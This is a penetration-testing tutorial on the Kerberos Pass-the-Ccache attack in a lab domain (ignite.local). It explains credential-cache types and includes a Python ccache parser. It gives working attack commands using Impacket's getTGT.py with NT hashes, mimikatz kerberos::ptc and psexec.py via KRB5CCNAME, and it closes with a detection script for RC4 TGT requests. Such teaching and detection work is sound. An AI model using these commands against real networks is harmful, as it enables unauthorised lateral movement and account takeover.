Lateral Movement: Pass the Ccache
In this post, we’ll discuss how an attacker uses a ccache file to bypass normal Kerberos authentication and access an application server without knowing the password. This attack is known as Pass the Ccache (PtC).
Table of Contents
Credential Cache
Ccache Types
Walkthrough Pass the Ccache attack
- Method 1: Mimikatz
- Method 2: KRB5CCNAME
Credential Cache
A credential cache (or “ccache”) holds Kerberos credentials while they remain valid and, typically, while the user’s session lasts, so that authenticating to services repeatedly (e.g. connecting to a web or mail server more than once) does not require contacting the KDC every time.
A credential cache usually holds one initial ticket that the user obtains with a password or another form of identity verification. If this ticket is a ticket-granting ticket (TGT), the user can use it to obtain additional credentials without the password. Because the credential cache does not store the password, a compromised machine causes less long-term damage to the user’s account.
A credential cache stores a default client principal name, which the system sets when it creates the cache. This is the name shown at the top of the klist output.
Ccache Types
The MIT Kerberos library supports several kinds of credential cache. Not every type is supported on every platform.
FILE caches: These are the simplest and most portable. A simple flat file format is used to store one credential after another. This is the default ccache type.
API: Implemented only on Windows. It communicates with a server process that holds the credentials in memory for the user, rather than writing them to disk.
DIR: Points to the storage location of a collection of credential caches in FILE: format. It is most useful when dealing with multiple Kerberos realms and KDCs.
KEYRING: Linux-specific; it uses the kernel keyring support to store credential data in unswappable kernel memory where only the current user should be able to access it.
MEMORY caches: These store credentials that don’t need to be available outside of the current process. Memory caches are faster than file caches and automatically destroy themselves when the process exits.
MSLSA: A Windows-specific cache type that accesses the Windows credential store.
Read more about the MIT Kerberos Credential Cache here: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
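Because FILE: is the default type and the one the tools in this post produce, it helps to know exactly what a recovered .ccache file gives its holder. The following reader and writer for the MIT FILE: format (version 4, the 0x0504 layout) is an added example written for this post; it is not code from the original post, from MIT Kerberos or from Impacket. It builds a constructed cache in memory (dummy key and ticket bytes, a made-up IGNITE.LOCAL realm) and parses it back, reporting the default client principal that klist shows at the top, each cached ticket, whether it is a TGT, its flags and how long it remains valid. The older 0x0503 layout, which carries an extra 16-bit enctype field in the keyblock, is deliberately rejected rather than guessed at.

```python
"""Reader and writer for the MIT Kerberos FILE: credential cache, format version 4."""
import struct

# Ticket flag bits as stored in a ccache credential (krb5.h TKT_FLG_* values).
TKT_FLAGS = {
    0x40000000: "forwardable",
    0x00800000: "renewable",
    0x00400000: "initial",
    0x00200000: "pre-authent",
}

# --- encoding, used only to construct the sample cache -----------------------
def _data(b):
    """Counted byte string: 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b

def _principal(name):
    """'comp1/comp2@REALM' -> name_type (1 = NT-PRINCIPAL), count, realm, components."""
    user, realm = name.rsplit("@", 1)
    comps = user.split("/")
    out = struct.pack(">II", 1, len(comps)) + _data(realm.encode())
    return out + b"".join(_data(c.encode()) for c in comps)

def build_sample_ccache(client, server, authtime, lifetime, flags):
    """Constructed v4 ccache with one credential; key and ticket bytes are dummies."""
    header = struct.pack(">HHii", 1, 8, 0, 0)              # tag 1 = DeltaTime (sec, usec)
    cred = _principal(client) + _principal(server)
    cred += struct.pack(">H", 0x12) + _data(b"\x00" * 32)  # keyblock: aes256-cts, dummy key
    cred += struct.pack(">IIII", authtime, authtime, authtime + lifetime, authtime + 7 * 86400)
    cred += b"\x00" + struct.pack(">I", flags)             # is_skey, ticket_flags
    cred += struct.pack(">II", 0, 0)                       # no addresses, no authdata
    cred += _data(b"dummy-ticket") + _data(b"")            # ticket, second_ticket
    return struct.pack(">HH", 0x0504, len(header)) + header + _principal(client) + cred

# --- decoding -----------------------------------------------------------------
class _Reader:
    def __init__(self, blob):
        self.b, self.off = blob, 0
    def take(self, n):
        chunk = self.b[self.off:self.off + n]
        if len(chunk) != n:
            raise ValueError("truncated ccache")
        self.off += n
        return chunk
    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def data(self): return self.take(self.u32())
    def principal(self):
        self.u32()                                          # name_type, not needed here
        ncomp = self.u32()
        realm = self.data().decode()
        return "/".join(self.data().decode() for _ in range(ncomp)) + "@" + realm
    def at_end(self): return self.off >= len(self.b)

def parse_ccache(blob):
    """Return the default principal and a summary dict for every cached credential."""
    r = _Reader(blob)
    if r.u16() != 0x0504:
        raise ValueError("only ccache format version 4 (0x0504) is handled here")
    r.take(r.u16())                                         # skip header tags (DeltaTime etc.)
    cache = {"default_principal": r.principal(), "credentials": []}
    while not r.at_end():
        client, server = r.principal(), r.principal()
        keytype, key = r.u16(), r.data()
        authtime, starttime, endtime, renew_till = struct.unpack(">IIII", r.take(16))
        r.take(1)                                           # is_skey
        flags = r.u32()
        for _ in range(r.u32()):                            # addresses: addrtype + data
            r.u16(); r.data()
        for _ in range(r.u32()):                            # authdata: authtype + data
            r.u16(); r.data()
        ticket, _second_ticket = r.data(), r.data()
        cache["credentials"].append({
            "client": client, "server": server, "enctype": keytype,
            "is_tgt": server.startswith("krbtgt/"),
            "endtime": endtime, "renew_till": renew_till,
            "flags": [name for bit, name in TKT_FLAGS.items() if flags & bit],
            "ticket_len": len(ticket),
        })
    return cache

def summarize(cache, now):
    """One line per cached ticket: what it grants its holder and for how long."""
    lines = []
    for c in cache["credentials"]:
        scope = "TGT (any service in the realm)" if c["is_tgt"] else "service ticket for " + c["server"]
        left = c["endtime"] - now
        state = "expired" if left <= 0 else "valid for %dh%02dm" % divmod(left // 60, 60)
        lines.append("%s -> %s, %s, flags=%s" % (c["client"], scope, state, ",".join(c["flags"])))
    return lines

if __name__ == "__main__":
    import time
    now = int(time.time())
    blob = build_sample_ccache("Administrator@IGNITE.LOCAL", "krbtgt/IGNITE.LOCAL@IGNITE.LOCAL",
                               now, 10 * 3600, 0x40E00000)
    cache = parse_ccache(blob)
    print("default principal:", cache["default_principal"])
    print("\n".join(summarize(cache, now)))
```

A TGT entry (server krbtgt/REALM) is what the rest of this post relies on: whoever holds the file can request service tickets for any host in the realm until endtime, and longer if the renewable flag is set and renew_till has not passed. A file holding only service tickets is far narrower in scope, which is why the summary distinguishes the two.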
Walkthrough Pass the Ccache attack
The pass-the-ccache attack uses a ticket-granting ticket (TGT) to access an application server without going through the normal Kerberos authentication, i.e. without the password. Here we store the Kerberos TGT in the form of a ccache file and pass this file to the application server’s service.
Method 1: Mimikatz
We use the Impacket Python script getTGT.py, which takes a password, NT hash or AES key, requests a TGT and saves it as a ccache file.
python getTGT.py -dc-ip 192.168.1.105 -hashes :32196b56ffe6f45e294117b91a83bf38 ignite.local/Administrator
The above command requests a Kerberos ticket and stores it as a ccache file; the following commands inject that ticket so the resource can be accessed.
Once you have the ccache, use mimikatz to pass the ccache file and access the resource; execute the following commands:
privilege::debug
kerberos::ptc Administrator.ccache
misc::cmd
Note: Here we first generated the ccache and then used mimikatz, but you can also pull the ccache from memory with klist -c, which lists the ccaches held in memory, and then use mimikatz to access the resource.
A new command prompt is then spawned, which is the CMD for the requested resource service. You can see that we access the resource without using the password or a ticket.kirbi file.
pushd \\ignite.local\c$
Method 2: KRB5CCNAME
Similarly, we use getTGT.py to generate the ccache and pass the ccache file to the requested service via the KRB5CCNAME environment variable. This approach is a completely remote attack that does not use the compromised victim’s local system. However, you need the account’s NTLM hash for it. Type the following to conduct the pass-the-ccache attack remotely.
python getTGT.py -dc-ip 192.168.1.105 -hashes :64fbae31cc352fc26af97cbdef151e03 ignite.local/yashika
export KRB5CCNAME=yashika.ccache; psexec.py -dc-ip 192.168.1.105 -target-ip 192.168.1.105 -no-pass -k ignite.local/yashika@WIN-S0V7KMTVLD2.ignite.local
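Both methods above obtain the TGT with getTGT.py and an NT hash. A request made with only an NT hash is limited to RC4-HMAC, so the TGT the KDC issues is recorded on the domain controller as Event ID 4768 with Ticket Encryption Type 0x17. In a domain where managed Windows hosts negotiate AES (0x11/0x12), that value, especially from an address that is not a managed host, is the signal a defender can key on. The routine below is an added example written for this post, not code from the original post or from Impacket; the flattened 4768 event lines, the IGNITE.LOCAL account names, the client addresses and the inventory of known hosts are all constructed for the example.

```python
"""Flag RC4-HMAC (0x17) TGT issuances in Windows Security Event ID 4768 records."""
import re

# Constructed Windows Security events (Event ID 4768, "A Kerberos authentication
# ticket (TGT) was requested"), flattened to one Key=Value line each. Every
# account name, host name and address below is made up for this example.
SAMPLE_4768 = [
    "EventID=4768 TargetUserName=jsmith TargetDomainName=IGNITE.LOCAL IpAddress=::ffff:192.168.1.20 TicketEncryptionType=0x12 PreAuthType=2 Status=0x0",
    "EventID=4768 TargetUserName=Administrator TargetDomainName=IGNITE.LOCAL IpAddress=::ffff:192.168.1.50 TicketEncryptionType=0x17 PreAuthType=2 Status=0x0",
    "EventID=4768 TargetUserName=yashika TargetDomainName=IGNITE.LOCAL IpAddress=::ffff:192.168.1.50 TicketEncryptionType=0x17 PreAuthType=2 Status=0x0",
    "EventID=4768 TargetUserName=WIN-S0V7KMTVLD2$ TargetDomainName=IGNITE.LOCAL IpAddress=::ffff:192.168.1.105 TicketEncryptionType=0x12 PreAuthType=2 Status=0x0",
    "EventID=4768 TargetUserName=svc_old TargetDomainName=IGNITE.LOCAL IpAddress=::ffff:192.168.1.20 TicketEncryptionType=0x17 PreAuthType=2 Status=0x0",
    "EventID=4768 TargetUserName=nobody TargetDomainName=IGNITE.LOCAL IpAddress=::ffff:192.168.1.50 TicketEncryptionType=0x17 PreAuthType=0 Status=0x6",
]

# Assumed asset inventory (hypothetical): addresses of domain-joined, managed hosts.
KNOWN_HOSTS = {"192.168.1.20", "192.168.1.105"}

RC4_HMAC = 0x17
_FIELD = re.compile(r"(\w+)=(\S+)")

def parse_event(line):
    """Turn one flattened 'Key=Value ...' event line into a dict."""
    return dict(_FIELD.findall(line))

def detect_rc4_tgt_requests(lines, known_hosts):
    """Return one finding per successful 4768 whose issued TGT used RC4-HMAC."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue                      # only successful TGT issuances matter here
        if int(ev.get("TicketEncryptionType", "0"), 16) != RC4_HMAC:
            continue                      # AES tickets are the expected baseline
        client = ev["IpAddress"].replace("::ffff:", "")   # strip IPv4-mapped prefix
        findings.append({
            "account": ev["TargetUserName"],
            "client": client,
            # RC4 from an unmanaged address is the strongest signal; from a known
            # host it may be a legacy account that still lacks AES keys.
            "severity": "high" if client not in known_hosts else "medium",
        })
    return findings

def clients_with_multiple_rc4_accounts(findings):
    """Client addresses that obtained RC4 TGTs for more than one account."""
    by_client = {}
    for f in findings:
        by_client.setdefault(f["client"], set()).add(f["account"])
    return sorted(c for c, accounts in by_client.items() if len(accounts) > 1)

if __name__ == "__main__":
    found = detect_rc4_tgt_requests(SAMPLE_4768, KNOWN_HOSTS)
    for f in found:
        print("%-6s RC4 TGT for %s from %s" % (f["severity"], f["account"], f["client"]))
    print("one client, several accounts:", clients_with_multiple_rc4_accounts(found))
```

The inventory check is what turns a noisy rule into a useful one: a few accounts in most domains still request RC4 for legitimate reasons, so the severity is lowered when the request comes from a managed host and raised when one unmanaged address collects RC4 TGTs for several accounts in a row, which is the pattern the two walkthroughs above produce.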
To learn more about Lateral Movement in Red Teaming, follow this link.
Author: Pavandeep Singh is a Technical Writer, Researcher, and Penetration Tester. Contact on Twitter and LinkedIn